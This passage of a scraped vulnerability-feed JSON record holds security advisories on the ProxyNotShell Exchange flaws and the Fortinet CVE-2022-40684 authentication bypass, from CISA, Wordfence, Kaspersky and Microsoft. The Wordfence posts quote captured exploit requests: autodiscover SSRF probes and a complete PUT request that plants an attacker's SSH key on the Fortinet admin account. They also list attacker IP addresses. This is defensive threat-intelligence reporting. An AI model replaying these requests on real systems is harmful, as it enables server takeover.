review the following information from Microsoft and apply the necessary mitigations until patches are made available:\n\n * [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)\n * [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa", "title": "Microsoft Releases Guidance on Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T00:00:00", "id": "CISA:8ED5E84007437E9B88D2418732B63E04", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft", "cvss": {"score": 0.0, "vector": "NONE"}}], "wordfence": [{"lastseen": "2022-10-19T17:09:20", "description": "The Wordfence Threat Intelligence team has been monitoring exploit attempts targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082, collectively known as ProxyNotShell. These vulnerabilities are actively being exploited in the wild. At the time of writing, we have observed 1,658,281 exploit attempts across our network of 4 million protected websites.\n\nGiven that a quick Shodan search shows 214,671 hosts running Exchange, this is not an insignificant vulnerability. Fortunately, tracking exploit attempts has been made easy due to the similarities to the ProxyShell vulnerability from 2021. From the time we began tracking ProxyNotShell, we have observed 3,543 IP addresses across 365 hosts sending requests that are attempting to probe for and exploit the vulnerabilities.\n\nFor more details on ProxyNotShell and the data we have collected, continue reading below or [download a PDF of this post here](<https://www.wordfence.com/wp-content/uploads/2022/10/Two-Weeks-of-Monitoring-ProxyNotShell-CVE-2022-41040-CVE-2022-41082-Threat-Activity-post.pdf>).\n\nThe following top 20 IP addresses are responsible for 313,011 of the tracked exploit attempts.\n\n * 91.245.255.98\n * 152.89.198.108\n * 199.47.92.216\n * 192.241.217.237\n * 192.241.217.39\n * 192.241.219.153\n * 192.241.219.69\n * 192.241.213.162\n * 192.241.219.73\n * 192.241.212.186\n * 192.241.216.62\n * 192.241.212.202\n * 192.241.216.14\n * 192.241.218.85\n * 192.241.215.205\n * 192.241.220.212\n * 192.241.202.142\n * 192.241.220.87\n * 192.241.218.123\n * 192.241.212.173\n\nLooking at the IP addresses being logged, it quickly becomes apparent that a large number of the IP addresses are part of the same CIDR range of 192.241.192.0/19. Nearly one-third of our logged requests probing and targeting this vulnerability come from these IP addresses, which are assigned to DigitalOcean. This means that Digitalocean\u2019s ASN is hosting nearly 3 times as many IPs sending requests targeting this vulnerability compared to the next most active host.\n\n\n\nWhile DigitalOcean is a legitimate virtual and dedicated server provider with a high reputation, it is still the source of many of the requests we have tracked. Threat actors often look for affordable solutions to quickly spin up an attack campaign, and in this case it appears that at least one threat actor either chose to use DigitalOcean as their provider or purchased access to a number of compromised servers on their network.\n\nMany of the requests we have observed thus far utilize GET requests to discover if the target is a vulnerable Exchange server. The requests we are seeing follow a few basic variations ranging from a basic `GET /autodiscover/autodiscover.json?%40zdi%2FPowershell= HTTP/1.1` to more complex requests like `GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1`. The second request example is an early proof-of-concept that has been used widely since its public release. If this looks familiar, that\u2019s because it is the same as the ProxyShell vulnerability exploit.\n\nThe user-agent also has a number of variations, primarily one reused from the user-agent for Firefox 105 on Windows 10. The top ten user-agent strings can be seen here:\n\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\n * Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0\n * Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36\n * Fuzz Faster U Fool v1.5.0-dev\n * Amazon CloudFront\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 X-Middleton/1\n * Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17\n * curl/7.79.1\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n\n\n\nThe top user-agent also appears with the most common request we are seeing, which can be seen in the request header below.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`Geoip-Addr: 91.245.255.98` \n`Connection: close` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Host: <redacted>`\n\nWhile the above GET request has been observed in 224,794 requests, it is used with multiple variations of request headers, though there are some consistencies in the query string. All of the requests are GET requests, are probing /autodiscover/autodiscover.json, and use Powershell, which are requirements to exploit this vulnerability.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`Connection: keep-alive` \n`Host: www.<redacted>.com`\n\nAs mentioned previously, the user-agent primarily being observed is Google Chrome on Windows 10, however despite that, we have observed a number of user-agent request headers that include MacOS user-agents, such as this header that includes an older user-agent for Firefox 76 on MacOS Mojave. In fact, this was the second-largest user-agent observed, with 35,811 requests logged.\n\n`GET /autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com HTTP/1.1` \n`Accept-Encoding: gzip` \n`Connection: close` \n`Host: <redacted>:443` \n`Referer: https://<redacted>:443/autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com` \n`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0`\n\nWhile less common, we are also seeing more complicated GET requests as well as more distinctive user-agents. The following request shows an attempt to exploit the ProxyNotShell vulnerabilities on a university website, using an open-source web fuzzer known as Fuzz Faster U Fool, which we see reflected in the user-agent string. This is one example of a logged exploit attempt that could either be the university\u2019s security team probing for the vulnerability to ensure any security holes are closed, or a threat actor probing for vulnerabilities to exploit. However, as this request was aimed at the website and not an Exchange server, it is more likely that this was an attempt by a threat actor to identify a vulnerability for the purpose of exploiting it.\n\n`GET /autodiscover/autodiscover.json?aa%40mail_<redacted>_edu_v6_6ipl9gf1rbdde8jlvh33c0t1tszjnbb0_<redacted>_com%2Fowa%2F%3F=&Email=autodiscover%2Fautodiscover.json%3Fa%40mail.<redacted>.edu.v6.6ipl9gf1rbdde8jlvh33c0t1tszjnbb0.<redacted>.com&Protocol=Autodiscoverv1&mail_<redacted>_edu_v6_euctlor93jplqgvt7pfbo85950brzin7_<redacted>_com=&protocol=Powershell HTTP/1.1` \n`Accept-Encoding: gzip` \n`Host: mail.<redacted>.edu` \n`User-Agent: Fuzz Faster U Fool v1.5.0-dev` \n`X-Https: 1`\n\nAs with ProxyShell, the ProxyNotShell exploit used on a vulnerable Exchange server can lead to remote code execution (RCE) on the server. This could lead to full takeover of a vulnerable server. The good news is that unlike ProxyShell, ProxyNotShell requires the threat actor to be authenticated with a real email address in order to exploit the vulnerability.\n\nThe Wordfence Intelligence IP Threat Feed will show new IP addresses attacking CVE-2022-41040 and CVE-2022-41082 in the \u201crce\u201d category as the feed is updated every 60 minutes.\n\nThe post [Two Weeks of Monitoring ProxyNotShell (CVE-2022-41040 &amp; CVE-2022-41082) Threat Activity](<https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/>) appeared first on [Wordfence](<https://www.wordfence.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T16:01:59", "type": "wordfence", "title": "Two Weeks of Monitoring ProxyNotShell (CVE-2022-41040 & CVE-2022-41082) Threat Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-19T16:01:59", "id": "WORDFENCE:035A383C0D3B38D6EEBF9FE95D1A356D", "href": "https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T22:06:40", "description": "This morning, the Wordfence Threat Intelligence team began tracking exploit attempts targeting CVE-2022-40684 on our network of over 4 million protected websites. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet\u2019s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild\u00b9,\u00b2.\n\nAt the time of publishing, we have recorded several exploit attempts and requests originating from the following IP addresses:\n\n * 206.189.231.41\n * 172.105.131.156\n * 45.79.174.33\n * 143.110.215.248\n * 159.180.168.61\n * 194.195.241.147\n * 45.79.174.9\n * 45.79.174.160\n * 134.122.38.186\n * 104.244.77.122\n * 45.79.174.212\n * 2.58.82.81\n * 194.163.135.129\n * 173.212.205.42\n * 172.104.6.178\n * 38.242.217.243\n * 194.135.83.48\n * 134.122.44.177\n * 207.180.241.85\n * 75.128.217.136\n * 107.189.4.80\n\nMost of the requests we have observed are GET requests presumably trying to determine whether a Fortinet appliance is in place:\n\n`GET /api/v2/cmdb/system/admin/admin HTTP/1.1 \nAccept-Encoding: gzip \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 \nConnection: close \nX-Forwarded-Proto: https \nX-Forwarded-Ssl: on \nX-Forwarded-For: 75.128.217.136 \nHost: <redacted> \nContent-Type: application/x-www-form-urlencoded`\n\nHowever, we also found that a number of these IPs are also sending out PUT requests matching the recently released proof of concept, referenced at the end of this advisory, which attempts to update the public SSH key of the admin user:\n\n`PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 \nX-Forwarded-For: 172.104.6.178 \nAccept-Encoding: gzip \nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; \nConnection: close \nUser-Agent: Report Runner \nHost: <redacted> \nContent-Type: application/json \nContent-Length: 610`\n\n` \n{ \n\"Ssh-public-key1\":\"\\\"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\\\"\" \n}`\n\nWhile some requests are using a fake public key, which may indicate a benign vulnerability scanner, all of the requests using a valid public key are using the same public key, indicating that these requests are all the work of the same actor. An attacker able to update or add a valid public SSH key to a user\u2019s account on a system can then typically gain access to that system as that user if they have the corresponding private key. In this case the attacker is attempting to add their own public key to the admin user\u2019s account.\n\nThe SSH key has the following fingerprint: `SHA256:GBl4Pytt+W2yEZ3zlOkAZkgtqmTPBcEZlqK4hoNOqBU dev@devs-MacBook-Pro.local (RSA)`\n\nAll of the `PUT` exploit attempts we have seen are using the \u201cReport Runner\u201d User-Agent as this is a requirement of the exploit, though the exploit may also be viable with the User-Agent set to \u201cNode.js\u201d.\n\nNew IP Addresses attacking CVE-2022-40684 will appear on the [Wordfence Intelligence](<https://www.wordfence.com/products/wordfence-intelligence/>) IP Threat Feed in the \u201cauth_bypass\u201d category as the feed is updated every 60 minutes.\n\n1\\. Fortinet released an advisory [with additional information](<https://www.fortiguard.com/psirt/FG-IR-22-377>), including affected products and workarounds for users unable to patch. \n2\\. Horizon3.ai initially discovered that the vulnerability was being exploited in the wild and released a [proof of concept](<https://github.com/horizon3ai/CVE-2022-40684>) earlier today.\n\nThe post [Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass](<https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/>) appeared first on [Wordfence](<https://www.wordfence.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T21:08:36", "type": "wordfence", "title": "Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-13T21:08:36", "id": "WORDFENCE:98268684EA16A81FCA6F004B3CE9D86A", "href": "https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-02-08T15:37:55", "description": "### *Detect date*:\n09/30/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Exchange Server 2016 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 22 \nMicrosoft Exchange Server 2019 Cumulative Update 11 \nMicrosoft Exchange Server 2019 Cumulative Update 12 \nMicrosoft Exchange Server 2013 Cumulative Update 23\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) \n[CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2022-41040](<https://vulners.com/cve/CVE-2022-41040>)5.0Critical \n[CVE-2022-41082](<https://vulners.com/cve/CVE-2022-41082>)5.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5019758](<http://support.microsoft.com/kb/5019758>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "kaspersky", "title": "KLA19264 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T00:00:00", "id": "KLA19264", "href": "https://threats.kaspersky.com/en/vulnerability/KLA19264/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-12T16:51:13", "description": "### *Detect date*:\n10/11/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface, obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Office LTSC 2021 for 64-bit editions \nMicrosoft Office LTSC 2021 for 32-bit editions \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft SharePoint Server Subscription Edition \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2019 for Mac \nMicrosoft Office LTSC for Mac 2021 \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office 2013 Service Pack 1 (64-bit editions)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-41036](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41036>) \n[CVE-2022-38001](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38001>) \n[CVE-2022-41037](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41037>) \n[CVE-2022-38048](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38048>) \n[CVE-2022-41031](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031>) \n[CVE-2022-38053](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38053>) \n[CVE-2022-38049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049>) \n[CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>) \n[CVE-2022-41038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *KB list*:\n[5002279](<http://support.microsoft.com/kb/5002279>) \n[5002287](<http://support.microsoft.com/kb/5002287>) \n[5002278](<http://support.microsoft.com/kb/5002278>) \n[5002283](<http://support.microsoft.com/kb/5002283>) \n[5002026](<http://support.microsoft.com/kb/5002026>) \n[5002290](<http://support.microsoft.com/kb/5002290>) \n[5002288](<http://support.microsoft.com/kb/5002288>) \n[5002284](<http://support.microsoft.com/kb/5002284>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "kaspersky", "title": "KLA20002 Multiple vulnerabilities in Microsoft Office", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-38001", "CVE-2022-38048", "CVE-2022-38049", "CVE-2022-38053", "CVE-2022-41031", "CVE-2022-41036", "CVE-2022-41037", "CVE-2022-41038", "CVE-2022-41043"], "modified": "2022-10-12T00:00:00", "id": "KLA20002", "href": "https://threats.kaspersky.com/en/vulnerability/KLA20002/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mssecure": [{"lastseen": "2022-10-07T17:09:27", "description": "> **October 1, 2022** **update** \u2013 Added information about _Exploit:Script/ExchgProxyRequest.A_, Microsoft Defender AV\u2019s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance. \n\nMicrosoft is aware of [limited targeted attacks](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for mitigation guidance regarding these vulnerabilities. \n\nCVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.\n\n## Analysis of observed activity\n\n### Attacks using Exchange vulnerabilities prior to public disclosure\n\nMSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\n\nMicrosoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.\n\nFigure 1: Diagram of attacks using Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082\n\n### Observed activity after public disclosure\n\nOn September 28, 2022, GTSC released a [blog](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.\n\nWhile these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.\n\n## Mitigation\n\nCustomers should refer to [Microsoft Security Response Center\u2019s post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for the latest on mitigations for the Exchange product.\n\nMicrosoft Exchange Server customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-365-defender>) are advised to follow this checklist:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Detection\n\n### Microsoft Defender Antivirus\n\n**Microsoft Exchange AMSI integration and Antivirus Exclusions**\n\nExchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the [guidance provided by the Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/bc-p/2576429/highlight/true>), as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange. \n\nMany organizations exclude Exchange directories from antivirus scans for performance reasons. It\u2019s highly recommended to audit AV exclusions on Exchange systems and assess if they can be removed without impacting performance and still ensure the highest level of protection. Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.\n\nTo audit AV exclusions on an Exchange Server running Defender Antivirus, launch the _Get-MpPreference_ command from an elevated PowerShell prompt.\n\nIf exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.\n\nMicrosoft Defender Antivirus detects the post-exploitation malware currently used in-the-wild exploitation of this vulnerability as the following:\n\n**Microsoft Defender Antivirus detections ******| **MITRE** **ATT&amp;CK Tactics observed ** \n---|--- \n[Exploit:Script/ExchgProxyRequest.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.A&threatId=-2147134610>) \n[Exploit:Script/ExchgProxyRequest.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.B&threatId=-2147134593>) \n[Exploit:Script/ExchgProxyRequest.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.C&threatId=-2147134381>) \n(the most robust defense from Microsoft Defender AV against this threat; requires Exchange AMSI to be enabled)| Initial Access \n[Backdoor:ASP/Webshell.Y](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:ASP/Webshell.Y>)| Persistence \n[Backdoor:Win32/RewriteHttp.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/RewriteHttp.A>)| Persistence \n[Backdoor:JS/SimChocexShell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/SimChocexShell.A!dha&threatId=-2147134707>)| Persistence \n[Behavior:Win32/IISExchgDropWebshell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.A!dha&threatId=-2147189378>)| Persistence \nBehavior:Win32/IISExchgDropWebshell.A | Persistence \n[Trojan:Win32/IISExchgSpawnCMD.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/IISExchgSpawnCMD.A&threatId=-2147190657>)| Execution \n[Trojan:Win32/WebShellTerminal.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.A&threatId=-2147189572>) | Execution 